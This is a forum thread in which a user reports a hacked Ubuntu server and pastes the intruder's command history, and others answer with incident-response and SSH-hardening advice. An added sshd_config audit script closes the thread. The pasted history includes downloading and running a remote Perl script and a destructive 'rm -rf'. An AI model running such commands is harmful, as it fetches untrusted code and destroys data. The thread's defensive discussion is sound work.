
Thread: I've been hacked

  1. #1
    Join Date
    Aug 2006
    Location
    Oz
    Beans
    Hidden!
    Distro
    Ubuntu

    I've been hacked

    Hi everyone,

    My server has been hacked.

    I noticed that I couldn't access its files remotely, so had a closer look. There were no files in my home folder.

    I looked at the log of commands, and this is what I found.

    sudo su
    pwd
    ls -a
    w
    id
    uname -a
    wget <some file>
    unzip root.txt.zip
    perl root.txt
    ls
    id
    rm -rf*
    exit -0

    Does anyone have any advice? How did they get my password after inputting 'sudo su'? Should I reinstall the OS? Is there anything I can do to safeguard against this in the future? Is this a bot or human?

    I know it's too late this time, but I don't want this to happen again, to me or anyone.

    All comments appreciated.

    Thanks
    Last edited by mörgæs; September 26th, 2013 at 12:15 PM. Reason: Removed link to possibly malicious file

  2. #2
    hakermania (Now you know what I write here!)
    Join Date
    Aug 2009
    Location
    Greece
    Beans
    1,705
    Distro
    Ubuntu Development Release

    Re: I've been hacked

    I am very sorry that this happened to you. I hope you had everything backed up. These are the worst type of hackers: logging in, deleting as many things as they can and then logging off. Probably without any good reason.

    I guess that you took the commands from the ~/.bash_history file? Weird that the hacker did not log in twice to wipe out the file so as to hide the commands from you.
    Please note that for root the commands are saved under /root/.bash_history, so if the "sudo su" command was successful, any commands run by the su session will be under /root/.bash_history.

    But, from my point of view, the first "sudo su" was unsuccessful (maybe the user he was logged in as could not become root this way), so he downloaded an exploit using wget and tried to run it so as to gain root privileges. If he had been successful I think that he would have wiped out the whole filesystem, not just your home folder. That makes me believe that his attempt to gain root privileges was unsuccessful.

    As to what gave him access to your server, who knows? There are way too many ways to attempt to access a server, from SQL injection, brute force attacks, XSS and the list goes on. I don't know many things about server configuration etc., but I guess that there will be a log somewhere which may say something interesting.

  3. #3
    Join Date
    Aug 2006
    Location
    Oz
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: I've been hacked

    Thanks for your advice. I think you're right.

    I need to boost security.

  4. #4
    Join Date
    Aug 2009
    Location
    Makati City, Philippines
    Beans
    2,269
    Distro
    Xubuntu 16.04 Xenial Xerus

    Re: I've been hacked

    Take the server offline immediately. If you have a backup of your data, reinstall everything so that you can bring the server back online with minimal downtime.
    I always enable the firewall and only allow ssh by default on all server deployments. You can change the ssh port and disable root login, and then use a secure password. It can be enough on a not so popular/not busy web server.

  5. #5
    Join Date
    Jul 2013
    Location
    Wisconsin
    Beans
    4,952

    Re: I've been hacked

    Nerdtron is right:
    - Take your server offline *immediately*
    - Complete reinstall. You don't know what other surprises are lurking.
    - Restore data from pre-hack backups. Do not try to preserve the data on your compromised system.

    Use ssh keys instead of passwords on an internet-facing server.

    See https://help.ubuntu.com/12.04/serverguide/security.html
    Last edited by ian-weisser; September 27th, 2013 at 12:28 AM.

  6. #6
    Join Date
    May 2012
    Beans
    248
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: I've been hacked

    Also, don't use the ssh default external port 22 on your router for port forwarding; use something higher than 9000.

    My server was continually bombarded with access attempts & I realised it was probably just a matter of time before someone got in.

    Since I changed it to a port above 9000, all went quiet. I also installed denyhosts; there are other programs too.

  7. #7
    Join Date
    Mar 2013
    Beans
    123

    Re: I've been hacked

    Also give them something to do. Install a honeypot and forward 22 to it. It's designed to capture what the hackers try to do.

  8. #8
    Join Date
    Jun 2011
    Beans
    409
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: I've been hacked

    Quote Originally Posted by ian-weisser View Post
    Nerdtron is right:
    - Take your server offline *immediately*
    - Complete reinstall. You don't know what other surprises are lurking.
    - Restore data from backups. Do not try to preserve the data on your compromised system.

    Use ssh keys instead of passwords on an internet-facing server.

    See https://help.ubuntu.com/12.04/serverguide/security.html
    The first two points are ok, but with the third one I have a problem: how does the OP know that his/her backups are not altered and that after a clean install those modifications won't get back on the system?? The best would be to make a copy of the hacked system, which can be useful for computer forensics, and install a clean system in a controlled environment, and after updates use something like AIDE (http://www.securitytube.net/video/4963) and keep the log files in a place that is not reachable from the Internet (on a USB stick in a safe). Maybe this is useful.

  9. #9
    Join Date
    Jul 2013
    Location
    Wisconsin
    Beans
    4,952

    Re: I've been hacked

    Quote Originally Posted by Gyokuro View Post
    how does the OP know that his/her backups are not altered and that after a clean install those modifications won't get back on the system??
    Good point. Clarified above to restore data from pre-hack backups.

  10. #10
    Join Date
    Aug 2009
    Beans
    Hidden!

    Re: I've been hacked

    Quote Originally Posted by Mahyar View Post
    There were no files in my home folder. (..) Should I reinstall the OS?
    If there were no files left in your home directory but the rest of the files are there, then their attempt to gain root may not have met with success.
    This should not automagically mean you're safe: only the result of investigating the cause and assessing the damage should count.
    Let us know if you would like to do that.


    Quote Originally Posted by Mahyar View Post
    Is there anything I can do to safeguard against this in the future?
    To start with:
    - Read your distribution's documentation,
    - Read your distribution's security documentation,
    - Install only the software you need -=[ now ]=-,
    - Update software when updates are released,
    - Disable services that are unused or easy to gain entry with,
    - Restrict access to services wherever possible,
    - Don't use simple passwords,
    - Use pubkey auth only for SSH access,
    - Enable proactive measures where possible,
    - Ensure you regularly audit your machine.
    Last edited by unspawn; September 27th, 2013 at 07:29 AM. Reason: //
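    Several replies here (#4, #5, #6 and the list in #10) boil down to a handful of sshd settings: no root login, keys instead of passwords, a non-default port. The script below is an added example, not code from any poster; it audits a given sshd_config against those settings and runs on two constructed sample configs. The assumed defaults for absent keys (PermitRootLogin prohibit-password, PasswordAuthentication yes, PubkeyAuthentication yes, Port 22) follow modern OpenSSH, and Match blocks are not handled.

```sh
#!/bin/sh
# Added example (not from the thread): audit sshd_config for the hardening
# settings recommended in the replies above.

# Effective value of KEY in FILE. sshd honours the FIRST occurrence of a keyword;
# commented-out lines never match because their first field starts with '#'.
# Assumption: no Match blocks (those would need per-block handling).
sshd_setting() {
    awk -v k="$2" 'tolower($1) == tolower(k) && !seen { print $2; seen = 1 }' "$1"
}

# Print one finding per weak setting. Absent keys fall back to the assumed
# OpenSSH defaults noted in the lead-in.
sshd_audit() {
    f="$1"
    root=$(sshd_setting "$f" PermitRootLogin);      root=${root:-prohibit-password}
    pw=$(sshd_setting "$f" PasswordAuthentication); pw=${pw:-yes}
    pk=$(sshd_setting "$f" PubkeyAuthentication);   pk=${pk:-yes}
    port=$(sshd_setting "$f" Port);                 port=${port:-22}
    [ "$root" = "no" ]  || echo "PermitRootLogin is '$root'; set it to 'no'"
    [ "$pw" = "no" ]    || echo "PasswordAuthentication is '$pw'; use keys only"
    [ "$pk" = "yes" ]   || echo "PubkeyAuthentication is '$pk'; enable it"
    [ "$port" != "22" ] || echo "Port is 22; the thread suggests a port above 9000"
}

# Number of findings; 0 means every checked setting is hardened.
sshd_audit_count() {
    sshd_audit "$1" | grep -c ''
}

# Constructed sample configs (not from the thread): one weak, one hardened.
WEAK_CONF=$(mktemp); HARD_CONF=$(mktemp)
trap 'rm -f "$WEAK_CONF" "$HARD_CONF"' EXIT
cat > "$WEAK_CONF" <<'EOF'
Port 22
#PermitRootLogin no
PermitRootLogin yes
PasswordAuthentication yes
EOF
cat > "$HARD_CONF" <<'EOF'
Port 9022
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
EOF

sshd_audit "$WEAK_CONF"   # the weak config yields three findings
```

Run it against /etc/ssh/sshd_config on a rebuilt server before it goes back online; the commented-out PermitRootLogin line in the weak sample shows why the audit must ignore comments and take the first live occurrence.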
